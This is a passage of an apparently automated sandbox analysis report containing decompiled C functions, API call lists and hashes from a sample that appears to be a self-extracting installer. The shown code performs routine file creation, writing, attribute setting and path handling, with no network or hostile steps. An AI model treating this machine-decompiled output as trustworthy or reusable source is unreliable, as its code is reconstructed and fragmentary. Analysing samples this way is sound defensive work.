                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E010D4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x010d4cd0
                                                                                                                                                                                                                                            0x010d4cdb
                                                                                                                                                                                                                                            0x010d4ce0
                                                                                                                                                                                                                                            0x010d4ce2
                                                                                                                                                                                                                                            0x010d4cee
                                                                                                                                                                                                                                            0x010d4cf2
                                                                                                                                                                                                                                            0x010d4d0e
                                                                                                                                                                                                                                            0x010d4d0e
                                                                                                                                                                                                                                            0x010d4d11
                                                                                                                                                                                                                                            0x010d4e83
                                                                                                                                                                                                                                            0x010d4e88
                                                                                                                                                                                                                                            0x010d4e98
                                                                                                                                                                                                                                            0x010d4e98
                                                                                                                                                                                                                                            0x010d4d17
                                                                                                                                                                                                                                            0x010d4d17
                                                                                                                                                                                                                                            0x010d4d1a
                                                                                                                                                                                                                                            0x010d4d2f
                                                                                                                                                                                                                                            0x010d4d2f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4d2f
                                                                                                                                                                                                                                            0x010d4d1c
                                                                                                                                                                                                                                            0x010d4d1c
                                                                                                                                                                                                                                            0x010d4d1f
                                                                                                                                                                                                                                            0x010d4dcb
                                                                                                                                                                                                                                            0x010d4dd0
                                                                                                                                                                                                                                            0x010d4dd2
                                                                                                                                                                                                                                            0x010d4ddd
                                                                                                                                                                                                                                            0x010d4ddd
                                                                                                                                                                                                                                            0x010d4de3
                                                                                                                                                                                                                                            0x010d4de8
                                                                                                                                                                                                                                            0x010d4dea
                                                                                                                                                                                                                                            0x010d4dea
                                                                                                                                                                                                                                            0x010d4ded
                                                                                                                                                                                                                                            0x010d4ded
                                                                                                                                                                                                                                            0x010d4def
                                                                                                                                                                                                                                            0x010d4df0
                                                                                                                                                                                                                                            0x010d4df0
                                                                                                                                                                                                                                            0x010d4df4
                                                                                                                                                                                                                                            0x010d4df4
                                                                                                                                                                                                                                            0x010d4df6
                                                                                                                                                                                                                                            0x010d4df9
                                                                                                                                                                                                                                            0x010d4dfc
                                                                                                                                                                                                                                            0x010d4dfc
                                                                                                                                                                                                                                            0x010d4dfe
                                                                                                                                                                                                                                            0x010d4dff
                                                                                                                                                                                                                                            0x010d4dff
                                                                                                                                                                                                                                            0x010d4e03
                                                                                                                                                                                                                                            0x010d4e05
                                                                                                                                                                                                                                            0x010d4e08
                                                                                                                                                                                                                                            0x010d4e0a
                                                                                                                                                                                                                                            0x010d4e0f
                                                                                                                                                                                                                                            0x010d4d03
                                                                                                                                                                                                                                            0x010d4d03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4d03
                                                                                                                                                                                                                                            0x010d4e18
                                                                                                                                                                                                                                            0x010d4e20
                                                                                                                                                                                                                                            0x010d4e25
                                                                                                                                                                                                                                            0x010d4e27
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4e33
                                                                                                                                                                                                                                            0x010d4e38
                                                                                                                                                                                                                                            0x010d4e3a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4e40
                                                                                                                                                                                                                                            0x010d4e51
                                                                                                                                                                                                                                            0x010d4e56
                                                                                                                                                                                                                                            0x010d4e5b
                                                                                                                                                                                                                                            0x010d4e5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4e6a
                                                                                                                                                                                                                                            0x010d4e6f
                                                                                                                                                                                                                                            0x010d4e71
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4e77
                                                                                                                                                                                                                                            0x010d4e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4e7d
                                                                                                                                                                                                                                            0x010d4d25
                                                                                                                                                                                                                                            0x010d4d25
                                                                                                                                                                                                                                            0x010d4d28
                                                                                                                                                                                                                                            0x010d4d36
                                                                                                                                                                                                                                            0x010d4d3b
                                                                                                                                                                                                                                            0x010d4d3d
                                                                                                                                                                                                                                            0x010d4d3d
                                                                                                                                                                                                                                            0x010d4d40
                                                                                                                                                                                                                                            0x010d4d40
                                                                                                                                                                                                                                            0x010d4d42
                                                                                                                                                                                                                                            0x010d4d43
                                                                                                                                                                                                                                            0x010d4d43
                                                                                                                                                                                                                                            0x010d4d47
                                                                                                                                                                                                                                            0x010d4d4a
                                                                                                                                                                                                                                            0x010d4d4a
                                                                                                                                                                                                                                            0x010d4d4c
                                                                                                                                                                                                                                            0x010d4d4f
                                                                                                                                                                                                                                            0x010d4d4f
                                                                                                                                                                                                                                            0x010d4d51
                                                                                                                                                                                                                                            0x010d4d52
                                                                                                                                                                                                                                            0x010d4d52
                                                                                                                                                                                                                                            0x010d4d56
                                                                                                                                                                                                                                            0x010d4d58
                                                                                                                                                                                                                                            0x010d4d5b
                                                                                                                                                                                                                                            0x010d4d5d
                                                                                                                                                                                                                                            0x010d4d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4d67
                                                                                                                                                                                                                                            0x010d4d6f
                                                                                                                                                                                                                                            0x010d4d74
                                                                                                                                                                                                                                            0x010d4d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4d7c
                                                                                                                                                                                                                                            0x010d4d84
                                                                                                                                                                                                                                            0x010d4d89
                                                                                                                                                                                                                                            0x010d4d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4d94
                                                                                                                                                                                                                                            0x010d4d99
                                                                                                                                                                                                                                            0x010d4d9e
                                                                                                                                                                                                                                            0x010d4da1
                                                                                                                                                                                                                                            0x010d4daa
                                                                                                                                                                                                                                            0x010d4daa
                                                                                                                                                                                                                                            0x010d4da3
                                                                                                                                                                                                                                            0x010d4da3
                                                                                                                                                                                                                                            0x010d4da3
                                                                                                                                                                                                                                            0x010d4db5
                                                                                                                                                                                                                                            0x010d4dbb
                                                                                                                                                                                                                                            0x010d4dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4dc3
                                                                                                                                                                                                                                            0x010d4dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4dc5
                                                                                                                                                                                                                                            0x010d4dbd
                                                                                                                                                                                                                                            0x010d4d2a
                                                                                                                                                                                                                                            0x010d4d2a
                                                                                                                                                                                                                                            0x010d4d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4d2d
                                                                                                                                                                                                                                            0x010d4cf8
                                                                                                                                                                                                                                            0x010d4cfd
                                                                                                                                                                                                                                            0x010d4d02
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010D4DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010D4DDD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3625706803-0
                                                                                                                                                                                                                                            • Opcode ID: 3118342770bf3761b0fcf709a323f699fe69037d83ba523418c1652d30b96cf3
                                                                                                                                                                                                                                            • Instruction ID: c6ae06fcb67904e9d04faab1796e38211f83fd55ed02e3665786b2017fcf57b9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3118342770bf3761b0fcf709a323f699fe69037d83ba523418c1652d30b96cf3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F4123362043029BDB71AF3CD9446F97BE5EF46300F0486A8D8C6D7E85DA32DA4ACB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E010D487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E010D490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x010d4880
                                                                                                                                                                                                                                            0x010d488c
                                                                                                                                                                                                                                            0x010d4894
                                                                                                                                                                                                                                            0x010d48a0
                                                                                                                                                                                                                                            0x010d48c9
                                                                                                                                                                                                                                            0x010d48ce
                                                                                                                                                                                                                                            0x010d48a2
                                                                                                                                                                                                                                            0x010d48a8
                                                                                                                                                                                                                                            0x010d48b7
                                                                                                                                                                                                                                            0x010d48bc
                                                                                                                                                                                                                                            0x010d48aa
                                                                                                                                                                                                                                            0x010d48ac
                                                                                                                                                                                                                                            0x010d48ac
                                                                                                                                                                                                                                            0x010d48a8
                                                                                                                                                                                                                                            0x010d48de
                                                                                                                                                                                                                                            0x010d48e7
                                                                                                                                                                                                                                            0x010d490b
                                                                                                                                                                                                                                            0x010d48ee
                                                                                                                                                                                                                                            0x010d48f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4902

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010D4A23,?,010D4F67,*MEMCAB,00008000,00000180), ref: 010D48DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010D4F67,*MEMCAB,00008000,00000180), ref: 010D4902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: c91300969b5619d2e7d325eaed0b17d3f8636a449393a1ec89512997725662c5
                                                                                                                                                                                                                                            • Instruction ID: d609f100cc4eca8ee585f41fe80697a6b182fcf272c3a6ae0f5bd5555c55229a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c91300969b5619d2e7d325eaed0b17d3f8636a449393a1ec89512997725662c5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27016DA3E126702AF36440398C89FFB955CCBD6675F1B0335BEEAE75C1D6644C0482E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E010D4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0x10d858c; // 0x268
                                                                                                                                                                                                                                            				_t9 = E010D3680(_t20);
                                                                                                                                                                                                                                            				if( *0x10d91d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0x10d8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t15 =  *0x10d9400 + _t25;
                                                                                                                                                                                                                                            							 *0x10d9400 = _t15;
                                                                                                                                                                                                                                            							if( *0x10d8184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10d93f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            0x010d4ad5
                                                                                                                                                                                                                                            0x010d4adb
                                                                                                                                                                                                                                            0x010d4ae7
                                                                                                                                                                                                                                            0x010d4aee
                                                                                                                                                                                                                                            0x010d4b05
                                                                                                                                                                                                                                            0x010d4b0d
                                                                                                                                                                                                                                            0x010d4b14
                                                                                                                                                                                                                                            0x010d4b1a
                                                                                                                                                                                                                                            0x010d4b21
                                                                                                                                                                                                                                            0x010d4b2a
                                                                                                                                                                                                                                            0x010d4b2f
                                                                                                                                                                                                                                            0x010d4b31
                                                                                                                                                                                                                                            0x010d4b39
                                                                                                                                                                                                                                            0x010d4b54
                                                                                                                                                                                                                                            0x010d4b54
                                                                                                                                                                                                                                            0x010d4b39
                                                                                                                                                                                                                                            0x010d4b2f
                                                                                                                                                                                                                                            0x010d4b0f
                                                                                                                                                                                                                                            0x010d4b0f
                                                                                                                                                                                                                                            0x010d4b0f
                                                                                                                                                                                                                                            0x010d4b5e
                                                                                                                                                                                                                                            0x010d4ae9
                                                                                                                                                                                                                                            0x010d4aed
                                                                                                                                                                                                                                            0x010d4aed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010D369F
                                                                                                                                                                                                                                              • Part of subcall function 010D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36B2
                                                                                                                                                                                                                                              • Part of subcall function 010D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010D4B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: 39df64131044268ffb71eb47369f3c4a8346e2d95286afa02b4a7e7a4057be7b
                                                                                                                                                                                                                                            • Instruction ID: c10e273a56c018d5a0e9bd05131aa6c34733e60e56259bc35ba949c5c2988281
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39df64131044268ffb71eb47369f3c4a8346e2d95286afa02b4a7e7a4057be7b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21018031201301ABD7248F68DC05FA67BA9FB58735F048266FEB9D75D4CB769811CB40
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0x10d8b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0x10d8b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E010D16B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x010d6592
                                                                                                                                                                                                                                            0x010d6594
                                                                                                                                                                                                                                            0x010d6596
                                                                                                                                                                                                                                            0x010d6598
                                                                                                                                                                                                                                            0x010d6598
                                                                                                                                                                                                                                            0x010d659b
                                                                                                                                                                                                                                            0x010d659b
                                                                                                                                                                                                                                            0x010d659d
                                                                                                                                                                                                                                            0x010d659e
                                                                                                                                                                                                                                            0x010d65a2
                                                                                                                                                                                                                                            0x010d65a4
                                                                                                                                                                                                                                            0x010d65a9
                                                                                                                                                                                                                                            0x010d65b2
                                                                                                                                                                                                                                            0x010d65b6
                                                                                                                                                                                                                                            0x010d65ba
                                                                                                                                                                                                                                            0x010d65c3
                                                                                                                                                                                                                                            0x010d65c5
                                                                                                                                                                                                                                            0x010d65c8
                                                                                                                                                                                                                                            0x010d65c8
                                                                                                                                                                                                                                            0x010d65c3
                                                                                                                                                                                                                                            0x010d65c9
                                                                                                                                                                                                                                            0x010d65cc
                                                                                                                                                                                                                                            0x010d65d2
                                                                                                                                                                                                                                            0x010d65d1
                                                                                                                                                                                                                                            0x010d65d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d65dc
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(010D8B3E,010D8B3F,00000001,010D8B3E,-00000003,?,010D60EC,010D1140,?), ref: 010D65BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: e9c0fb66e33a3818e0b788dc009ab9c825aa53a774e9da4094595a2060724cc9
                                                                                                                                                                                                                                            • Instruction ID: 05c6c2e5bd0fdf0831feaf7b3962c1efe9d3de5243aee7a7b13ad65ec416e423
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9c0fb66e33a3818e0b788dc009ab9c825aa53a774e9da4094595a2060724cc9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BEF042321043509BD331451D9884BA6BFDD9B96150F59019EF9DAC320DCA674D8587A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E010D621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E010D597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x010d6229
                                                                                                                                                                                                                                            0x010d6230
                                                                                                                                                                                                                                            0x010d6247
                                                                                                                                                                                                                                            0x010d626a
                                                                                                                                                                                                                                            0x010d6272
                                                                                                                                                                                                                                            0x010d6249
                                                                                                                                                                                                                                            0x010d6255
                                                                                                                                                                                                                                            0x010d625f
                                                                                                                                                                                                                                            0x010d6264
                                                                                                                                                                                                                                            0x010d6264
                                                                                                                                                                                                                                            0x010d6284

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010D623F
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                              • Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: e96bab625b8581ea87d0365f95d76b6ca26b9254117f05b993042e73eed3e00a
                                                                                                                                                                                                                                            • Instruction ID: 94fae7b5e772a6104eb3040b26f2d6a2a54140a636ba37b5be9eca52e7acc0b8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e96bab625b8581ea87d0365f95d76b6ca26b9254117f05b993042e73eed3e00a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F05EB0704309ABE7A0EB74DD06FFE77A8DB54700F40446AA9C6D7181ED7A99848754
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D4B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0x10d8d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0x10d8d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
